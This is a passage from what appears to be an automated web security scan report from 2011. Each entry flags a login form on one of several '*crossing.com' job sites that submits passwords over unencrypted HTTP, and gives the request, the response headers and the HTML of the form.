rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.13. http://www.aviationcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aviationcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.aviationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:22:03 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5ito8gdqrme71tdpjpbd47goi6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:22:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 123144

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.aviationcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.14. http://www.bilingualcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bilingualcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.bilingualcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:03 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3jv1797bk3m69qp27lbh4qrqj2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133153

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.bilingualcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.15. http://www.biotechcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biotechcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.biotechcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:05 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u6vsjargff90aq2r4fvrep9g90; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119741

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.biotechcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.16. http://www.bluecollarcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bluecollarcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.bluecollarcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:36 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=phn4e0vehg11att6t127knugu0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:36 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:36 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149168

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.bluecollarcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.17. http://www.businessanalystcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businessanalystcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.businessanalystcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:41 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kldqa0cqamr0mp6anoh752e7o2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 124047

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.businessanalystcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.18. http://www.businessdevelopmentcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businessdevelopmentcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.businessdevelopmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ru1216s8gi6hento64jtdlqce3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116452

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.businessdevelopmentcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.19. http://www.callcentercrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.callcentercrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.callcentercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=prr05v672vhpd9l46bt5lu88r3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128551

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.callcentercrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.20. http://www.chefcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chefcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.chefcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ha4et9frtsniged97g2n86qvf0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108888

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.chefcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.21. http://www.civilengineeringcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.civilengineeringcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.civilengineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:59 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=soga8db6spril7hls6mrahaid5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106801

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.civilengineeringcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.22. http://www.clevelcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clevelcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.clevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:10 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7grpnh4ane7h6vq7m94a09osd0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 115509

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.clevelcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.23. http://www.clinicalresearchcrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clinicalresearchcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.clinicalresearchcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pot86ho5ls3u8ap2dd0c7javd7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101472

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.clinicalresearchcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.24. http://www.compliancecrossing.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.compliancecrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.compliancecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t20irb9usa5ru4jlcuufdl43b5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135192

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
